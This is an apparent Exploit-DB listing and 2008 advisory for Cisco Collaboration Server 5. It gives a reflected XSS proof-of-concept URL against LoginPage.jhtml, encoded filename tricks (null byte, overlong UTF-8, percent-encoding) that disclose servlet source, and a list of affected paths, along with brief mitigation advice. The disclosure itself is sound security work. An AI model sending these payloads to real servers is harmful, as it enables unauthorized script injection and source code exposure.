header-logo
Suggest Exploit
vendor:
Cisco Collaboration Server 5
by:
s4squatch of SecureState R&D Team
7,5
CVSS
HIGH
Cross-Site Scripting (XSS) and Source Code Disclosure
79 (XSS) and 522 (Source Code Disclosure)
CWE
Product Name: Cisco Collaboration Server 5
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Cisco Collaboration Server 5 XSS, Source Code Disclosure

Cisco Collaboration Server 5 is vulnerable to Cross-Site Scripting (XSS) and Source Code Disclosure. An attacker can inject malicious JavaScript code into the vulnerable parameter of the LoginPage.jhtml file. Additionally, the source code of .jhtml files can be revealed to the end user by requesting any of the following: Normal File, Modified 1, Modified 2, Modified 3, and Modified 4.

Mitigation:

Ensure that user input is properly sanitized and filtered before being used in the application. Additionally, ensure that the source code of .jhtml files is not revealed to the end user.
Source

Exploit-DB raw data:

Cisco Collaboration Server 5 XSS, Source Code Disclosure

Discovered by:  s4squatch of SecureState R&D Team (www.securestate.com)

Discovered: 08/26/2008

 

Note: End of Engineering  -->  http://www.cisco.com/en/US/products/sw/custcosw/ps747/prod_eol_notice09186a008032d4d0.html

Replaced with: http://www.cisco.com/en/US/products/ps7233/index.html and http://www.cisco.com/en/US/products/ps7236/index.html

 

 

XSS

===

http://www.website.com/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest="><script>alert('xss!')</script>

 

Java Servlet Source Code Disclosure

===================================

The source code of .jhtml files is revealed to the end user by requesting any of the following:

 

Normal File:                        file.html

 

Modified 1:                                         file%2Ejhtml

Modified 2:                                         file.jhtm%6C

Modified 3:                                         file.jhtml%00

Modified 4:                                         file.jhtml%c0%80

 

Cisco Collaboration Server 5 Paths It Works On (list may not be complete)

=========================================================================                                                                                                            

http://www.website.com/doc/docindex.jhtml                                                                                                                                                                                                

http://www.website.com/browserId/wizardForm.jhtml

http://www.website.com/webline/html/forms/callback.jhtml

http://www.website.com/webline/html/forms/callbackICM.jhtml

http://www.website.com/webline/html/agent/AgentFrame.jhtml

http://www.website.com/webline/html/agent/default/badlogin.jhtml

http://www.website.com/callme/callForm.jhtml

http://www.website.com/webline/html/multichatui/nowDefunctWindow.jhtml

http://www.website.com/browserId/wizard.jhtml

http://www.website.com/admin/CiscoAdmin.jhtml

http://www.website.com/msccallme/mscCallForm.jhtml

http://www.website.com/webline/html/admin/wcs/LoginPage.jhtml

 

Related Public Info

===================

https://www.securityfocus.com/bid/3592/info

https://www.securityfocus.com/bid/1578/info

https://www.securityfocus.com/bid/1328/info